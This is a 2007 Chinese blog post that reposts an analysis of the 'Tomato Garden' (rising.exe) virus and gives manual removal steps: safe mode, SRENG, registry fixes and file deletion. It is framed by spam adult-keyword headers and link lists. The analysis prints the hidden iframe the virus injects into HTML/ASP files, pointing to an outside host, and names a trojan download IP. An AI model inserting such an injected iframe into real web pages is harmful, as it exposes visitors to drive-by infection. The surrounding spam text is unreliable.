青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

牽著老婆滿街逛

嚴以律己,寬以待人. 三思而后行.
GMail/GTalk: yanglinbo#google.com;
MSN/Email: tx7do#yahoo.com.cn;
QQ: 3 0 3 3 9 6 9 2 0 .

番茄花園病毒

http://www.mmswz.com/bbs1/dispbbs.asp?boardid=13&ID=3653


查找到如此資料,可據此清除病毒。但我覺得最好還是重裝系統了。

 


關于 修改系統時間 并感染exe成為番茄花園的病毒(rising.exe rising.eve)
2007-05-03 15:40
今天發現此種病毒求助者見多 收到樣本后 利馬測試了一下
該病毒就是前些日子流行的 修改系統時間的病毒之變種
此次變種可謂是集N種破壞性病毒之大成了
主要破壞功能有:1.感染exe 并使得被感染的exe的公司等屬性變為 番茄花園
2.感染html asp 等文件 插入惡意代碼
3.通過雙擊磁盤啟動
4.下載木馬,盜取網游帳號
5.修改注冊表 使系統無法顯示隱藏文件
6.通過hook API 函數 導致任務管理器中 無法看見其進程
分析報告如下:
File: ising.exe
Size: 64775 bytes
File Version: 1.00
MD5: 86311B37D938BB35645E7B092014DD63
SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3
CRC32: 88ABBD9B

rising.exe 運行后 首先釋放一個rising.eve的文件 然后由rising.exe啟動他
之后 釋放139CA82A.EXE 139CA82A.dll(隨機的8個數字字母組合成的文件名)到系統文件夾
注冊服務139CA82A.EXE
139CA82A.EXE控制winlogon進程 使得139CA82A.dll插入幾乎所有進程

釋放rising.exe 和autorun.inf 到每個分區 使得雙擊磁盤啟動
感染 除系統分區外的某個分區的exe文件 使得其公司名全變為 番茄花園
感染 html asp 等文件 在其后面插入代碼
<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>

修改系統時間 隨機把年份往前調 月,日不變
修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue:
值為 0x00000000
導致無法顯示臨時文件

rising.exe 還會hook 多個 API函數 使其進程在任務管理器中隱藏

使用Explorer.exe連接網絡 61.152.92.98:80下載木馬
下載的木馬一般為K117815XXXXX.exe
XXXXX代表隨機
到系統文件夾

由于 每臺機器上下載的木馬的名稱不同 但最后結果相同 所以中間釋放的過程省略
最后 這些木馬運行后分別釋放了如下文件
C:\WINDOWS\system32\buchehuo.exe(創建了服務inetsvr)

C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe

C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe

C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe

C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe

C:\WINDOWS\system32\winsock.exe

臨時文件夾下 釋放upxdnd.exe和upxdnd.dll


解決辦法:
安全模式下(開機后不斷 按F8鍵 然后出來一個高級菜單 選擇第一項 安全模式 進入系統)

首先把系統日期 改回來
然后打開sreng
啟動項目 注冊表 刪除如下項目
<upxdnd><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.exe> []
<msccrt><C:\WINDOWS\msccrt.exe> []
<cmdbs><C:\WINDOWS\cmdbs.exe> []
<mppds><C:\WINDOWS\mppds.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<winform><C:\WINDOWS\winform.exe> []

“啟動項目”-“服務”-“Win32服務應用程序”中點“隱藏經認證的微軟項目”,
選中以下項目,點“刪除服務”,再點“設置”,在彈出的框中點“否”:
139CA82A / 139CA82A
Wireless Zero Conflguration / inetsvr


把下面的 代碼拷入記事本中然后另存為1.reg文件
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"

雙擊1.reg把這個注冊表項導入

然后雙擊我的電腦-工具-文件夾選項-查看-顯示所有文件和文件夾,把“隱藏受保護的系統文件”的勾去掉。

右鍵 點擊C盤 點擊右鍵菜單中的“打開”打開C盤 (千萬不要雙擊)(如圖)
刪除 如下文件
C:\rising.exe
C:\autorun.inf
C:\WINDOWS\system32\buchehuo.exe
C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
C:\WINDOWS\unspapik.txt
C:\WINDOWS\wiasevct.txt
C:\WINDOWS\wiasvctr.txt
C:\WINDOWS\ganran.txt
C:\WINDOWS\system32\139CA82A.DLL(隨機的8個數字字母組合成的文件名)
C:\WINDOWS\system32\139CA82A.EXE(隨機的8個數字字母組合成的文件名)
C:\WINDOWS\system32\K117815XXXXX.exe(XXXXX代表隨機數字)
清空C:\Documents and Settings\用戶名\Local Settings\Temp

右鍵 點擊分別打開系統分區以外的分區 還是點擊右鍵菜單中的“打開” (千萬不要雙擊)
刪除每個分區下面的autorun.inf和rising.exe文件

由于殺毒軟件還不能認出這個病毒所以還是暫時不要點擊 受感染的exe 和html,asp文件



據說ClamWin Free Antivirus這個殺毒軟件能查殺這種病毒,我沒試過,也許行,不妨試試。

這個殺毒軟件是英文版的,沒有中文版。如果使用,記得先把原有的殺毒軟件卸載掉,然后安裝新的。注意應該是在安全模式下查殺病毒。

軟件介紹:ClamWin是一套功能非常優秀的免費防毒軟件。它的體積非常嬌小,不會占用太多計算機資源,不像其它防毒軟件安裝之后會拖累整臺計算機的速度。而且除了強大的文件與電子郵件防護能力之外,它還擁有排程掃描、在線更新病毒碼、及時偵測等功能,和市面上知名防毒軟件比起來一點也不遜色!<script language="javascript" src="../newhuagg/js_ad_show_8.js"></script>

下載頁面:http://www.onlinedown.net/soft/44149.htm



SRENG是指System Repair Engineer,官方網站:http://www.kztechs.com/index1.html

軟件直接下載:http://download.kztechs.com/files/sreng2.zip

介紹和說明:http://www.pxue.com/Html/893.html

posted on 2007-05-26 23:21 楊粼波 閱讀(210) 評論(0)  編輯 收藏 引用


只有注冊用戶登錄后才能發表評論。
網站導航: 博客園   IT新聞   BlogJava   博問   Chat2DB   管理


青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            在线不卡a资源高清| 欧美一区二区三区在线免费观看| 亚洲激情在线观看| 精久久久久久久久久久| 韩日午夜在线资源一区二区| 国产九色精品成人porny| 久久亚洲精品视频| 欧美激情久久久| 欧美日本不卡| 国产伦精品一区二区三区视频孕妇| 国产精品久久久久久久久婷婷| 国产精品自在在线| 亚洲国产成人精品女人久久久| 亚洲啪啪91| 性欧美超级视频| 老牛国产精品一区的观看方式| 欧美福利网址| 亚洲一区二区日本| 久久综合国产精品| 欧美日韩在线三级| 国产亚洲精品aa| 日韩网站在线| 久久久久久**毛片大全| 欧美国产精品久久| 亚洲专区一区二区三区| 久久久久这里只有精品| 欧美日韩国产首页| 在线精品亚洲一区二区| 亚洲免费一在线| 亚洲丰满少妇videoshd| 一区二区精品国产| 巨乳诱惑日韩免费av| 国产精品久久久久秋霞鲁丝| 伊人久久大香线蕉综合热线 | 国产精品久久久久国产a级| 国产真实乱子伦精品视频| 亚洲麻豆一区| 久久午夜精品一区二区| 中文日韩欧美| 欧美国产精品久久| 在线精品福利| 久久精品国产2020观看福利| 亚洲欧洲三级电影| 久久久精品视频成人| 国产麻豆成人精品| 亚洲欧美日韩国产精品 | 一本色道久久精品| 免费成人在线视频网站| 午夜在线观看免费一区| 国产精品成人一区二区三区吃奶 | 亚洲人成在线影院| 美女尤物久久精品| 伊大人香蕉综合8在线视| 欧美一级大片在线观看| 亚洲无亚洲人成网站77777| 欧美日韩一卡| 亚洲天堂男人| 99精品热6080yy久久| av成人毛片| 亚洲欧美日韩中文在线制服| 亚洲国产人成综合网站| 久久久www免费人成黑人精品| 国产麻豆精品theporn| 亚洲在线观看免费| 亚洲国产综合视频在线观看| 蜜桃久久精品一区二区| 怡红院av一区二区三区| 免费观看成人网| 麻豆av福利av久久av| 91久久精品美女高潮| 亚洲高清一二三区| 欧美日韩国产综合视频在线| 一区二区三区国产| 亚洲免费网址| 精品福利免费观看| 欧美激情一区二区三区四区| 欧美成人精品福利| 亚洲午夜精品一区二区三区他趣| 99精品欧美一区二区三区综合在线| 欧美三日本三级三级在线播放| 亚洲一区免费看| 欧美一区2区三区4区公司二百| 禁久久精品乱码| 亚洲日本中文字幕免费在线不卡| 国产精品va在线播放| 久久久精品一区二区三区| 久久综合伊人77777麻豆| 日韩视频在线一区二区三区| 这里只有视频精品| 黄色成人在线观看| 亚洲精品午夜精品| 国产午夜精品福利| 亚洲国产婷婷香蕉久久久久久99| 欧美日韩视频免费播放| 久久精品国产99国产精品澳门| 久久久久久国产精品mv| 日韩午夜电影av| 欧美专区亚洲专区| 一本色道久久88综合日韩精品 | 久久久午夜精品| 欧美日产一区二区三区在线观看| 午夜久久99| 另类专区欧美制服同性| 亚洲视频在线观看| 久久久久一区二区| 午夜精品美女自拍福到在线 | 国产一区二区高清不卡| 亚洲二区在线视频| 国产综合视频在线观看| 99在线|亚洲一区二区| 极品尤物av久久免费看| 亚洲一区精品电影| 亚洲精品1234| 久久久久久久久久久久久女国产乱| 在线亚洲一区二区| 免费视频亚洲| 久久在线免费观看视频| 国产精品毛片高清在线完整版| 国产精品一区二区三区观看| 亚洲一区二区少妇| 久久国产精品久久国产精品| 一区二区欧美在线观看| 亚洲午夜精品久久久久久浪潮| 久久国产主播| 欧美在线观看www| 欧美网站在线| 亚洲人成人99网站| 91久久精品国产91性色tv| 久久久精品动漫| 久久久久91| 国产真实乱偷精品视频免| 亚洲视频免费在线| 亚洲一区中文| 国产精品久久久久一区| 亚洲老板91色精品久久| 亚洲精品国精品久久99热一 | 欧美调教vk| 一区二区电影免费观看| 一二三区精品| 欧美日韩亚洲在线| 制服丝袜激情欧洲亚洲| 亚洲无线视频| 国产精品视频yy9099| 亚洲午夜黄色| 欧美专区亚洲专区| 国产一区二区三区免费在线观看| 午夜在线视频一区二区区别| 久久大香伊蕉在人线观看热2| 国产模特精品视频久久久久| 午夜精品久久久久久久蜜桃app| 欧美一区二区三区播放老司机| 国产精品视频福利| 欧美在线free| 欧美国产日韩a欧美在线观看| 亚洲七七久久综合桃花剧情介绍| 欧美二区在线| 一区二区三区高清| 欧美亚洲一区| 一区在线视频| 欧美欧美天天天天操| 亚洲特级片在线| 久久久久久网| aa成人免费视频| 国产九区一区在线| 米奇777在线欧美播放| 99精品欧美一区| 久久午夜精品| 亚洲一级二级| 精品成人一区| 欧美视频在线观看视频极品| 一区二区三区.www| 老色鬼精品视频在线观看播放| 999亚洲国产精| 国产一区二区福利| 欧美日韩精品在线视频| 性久久久久久久久| 亚洲精品裸体| 久久一区视频| 亚洲欧美日韩视频二区| 在线观看日韩欧美| 国产精品成人免费| 女同一区二区| 午夜精品婷婷| 久久久另类综合| 亚洲一区二区在线看| 亚洲国产经典视频| 国产区精品在线观看| 欧美激情一区二区三区全黄| 久久久久久夜精品精品免费| 一区二区欧美日韩| 国产一区二区黄| 欧美四级在线观看| 免费亚洲视频| 久久精品国产999大香线蕉| 亚洲人成在线观看网站高清| 久久久久一区二区| 午夜视频一区在线观看| 一片黄亚洲嫩模| 亚洲三级电影在线观看| 国产综合欧美|